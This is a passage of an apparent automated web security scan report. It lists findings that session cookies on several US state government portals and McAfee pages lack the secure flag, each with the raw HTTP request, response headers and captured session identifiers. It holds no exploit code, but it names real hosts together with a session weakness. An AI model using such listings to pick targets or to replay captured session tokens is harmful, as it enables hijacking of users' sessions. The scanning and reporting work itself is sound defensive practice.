X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 16134
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=GGPDNOPBCNJOIMNCHIBHMPMF; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...

7.15. https://dhr.ky.gov/DHRWeb/RS  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://dhr.ky.gov
Path:   /DHRWeb/RS

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DHRWeb/RS HTTP/1.1
Host: dhr.ky.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Document follows
Server: IBM HTTP Server/V5R3M0
Connection: close
Accept-Ranges: bytes
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 10123
Last-Modified: Sat, 30 Apr 2011 12:20:07 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Language: en-US
Set-Cookie: JSESSIONID=0000nPEe3iyv3vDZg8IytDP4Wxw:C5A1D6DE31FD990B000007D400000F8A00000000; Path=/
Date: Sat, 30 Apr 2011 12:20:08 GMT
Server: WebSphere Application Server/7.0
Cache-Control: no-cache="set-cookie, set-cookie2"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

       <title>DHR.KY.GOV - Home Page</title>
       
       <meta
...[SNIP]...

7.16. https://dotax.ehawaii.gov/efile/user  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://dotax.ehawaii.gov
Path:   /efile/user

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /efile/user HTTP/1.1
Host: dotax.ehawaii.gov
Connection: keep-alive
Referer: https://www.ehawaii.gov/efile/
Cache-Control: max-age=0
Origin: https://www.ehawaii.gov
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral
Content-Length: 78

SESSION_ID=&CURRSTATE=com.hic.dotax.user.gui.Login&SSN=&PASSWORD=&SUBMIT=Login

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=4969BAED74BE5E78E258F5BA163F8473.lono; Path=/efile
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 7156

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

7.17. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://egov.dnrec.delaware.gov
Path:   /egovpublic/dnrec/disp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /egovpublic/dnrec/disp HTTP/1.1
Host: egov.dnrec.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 30 Apr 2011 12:20:03 GMT
Server: Apache/2.2.0 (Fedora)
Surrogate-Control: no-store
$WSEP:
Set-Cookie: JSESSIONID=0000i5hwqBmEjB1A7BDb_F_urhk:1414d4ncb; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 12
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

Error 500:

7.18. https://fin.oaks.ohio.gov/psp/FNPRD/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://fin.oaks.ohio.gov
Path:   /psp/FNPRD/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /psp/FNPRD/ HTTP/1.1
Host: fin.oaks.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: fin.oaks.ohio.gov=R1934382832; path=/
Date: Sat, 30 Apr 2011 12:20:09 GMT
Content-Length: 12902
Content-Type: text/html; CHARSET=utf-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: FNPRD-PORTAL-PSJSESSIONID=8SKyN72hGDFKBkl1QC8vYfpb7c1J2114!-669996233; domain=.oaks.ohio.gov; path=/
Cache-Control: no-store
RespondingWithSignonPage: true
Connection: close

<!--* ******************************************************************
* Confidentiality Information:
*
* This module is the confidential and proprietary information of
* PeopleSoft, Inc.;
...[SNIP]...

7.19. https://fortress.wa.gov/dol/dolprod/dsdoffices/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://fortress.wa.gov
Path:   /dol/dolprod/dsdoffices/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dol/dolprod/dsdoffices/ HTTP/1.1
Host: fortress.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html; charset=utf-8
date: Sat, 30 Apr 2011 12:20:40 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: Microsoft-IIS/6.0
x-old-content-length: 26606
cache-control: private
x-powered-by: ASP.NET
x-aspnet-version: 2.0.50727
Set-Cookie: AMWEBJCT!%2Fdol%2Fdolprod!ASP.NET_SessionId=jicq3e45qrkfam55gph5la45; Path=/
Set-Cookie: PD_STATEFUL_101c5ca4-0734-11dc-b4ac-000255ef2051=%2Fdol%2Fdolprod; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1">
...[SNIP]...

7.20. https://georgiawildlife.dnr.state.ga.us/service/login1.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://georgiawildlife.dnr.state.ga.us
Path:   /service/login1.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /service/login1.asp HTTP/1.1
Host: georgiawildlife.dnr.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDCCRQTQAT=JJGJOMPANKAFPMLCIIKOKEKL;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:20:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 28917
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCBDBRT=MNHLBBNBFOPGOOKAIIBNMDLG; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="serve
...[SNIP]...

7.21. https://hcm.oaks.ohio.gov/psp/HCPRD/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://hcm.oaks.ohio.gov
Path:   /psp/HCPRD/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /psp/HCPRD/ HTTP/1.1
Host: hcm.oaks.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: hcm.oaks.ohio.gov=R2338435115; path=/
Date: Sat, 30 Apr 2011 12:20:31 GMT
Content-Length: 14341
Content-Type: text/html; CHARSET=utf-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: HCPRD-PORTAL-PSJSESSIONID=l6sLN72PQQ42bBRK22SfpKLTH5zqJJvN!-609733431; domain=.oaks.ohio.gov; path=/
Cache-Control: no-store
RespondingWithSignonPage: true
Connection: close

<!--* ******************************************************************
* Confidentiality Information:
*
* This module is the confidential and proprietary information of
* PeopleSoft, Inc.;
...[SNIP]...

7.22. https://home.mcafee.com/ScriptResource.axd  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /ScriptResource.axd

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ScriptResource.axd HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:44 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:44 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
X-Powered-By: ASP.NET
MS: SJV1
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:44 GMT
Connection: close
Content-Length: 9425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

7.23. https://home.mcafee.com/Secure/Protected/Login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /Secure/Protected/Login.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secure/Protected/Login.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:21 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV1
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:21 GMT
Content-Length: 52910
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

7.24. https://home.mcafee.com/WebResource.axd  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /WebResource.axd

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebResource.axd HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:40 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:40 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
X-Powered-By: ASP.NET
MS: SJV8
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:40 GMT
Connection: close
Content-Length: 9425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

7.25. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /WebServices/AccountWebSvc.asmx/js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebServices/AccountWebSvc.asmx/js HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript; charset=utf-8
Expires: Wed, 21 Apr 2010 22:42:19 GMT
Last-Modified: Thu, 21 Apr 2011 22:42:19 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:45 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV4
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:44 GMT
Content-Length: 4551
Connection: close

Type.registerNamespace('McAfee.WebServices');
McAfee.WebServices.AccountWebSvc=function() {
McAfee.WebServices.AccountWebSvc.initializeBase(this);
this._timeout = 0;
this._userContext = null;
thi
...[SNIP]...

7.26. https://home.mcafee.com/secure/cart  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/cart

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/cart HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
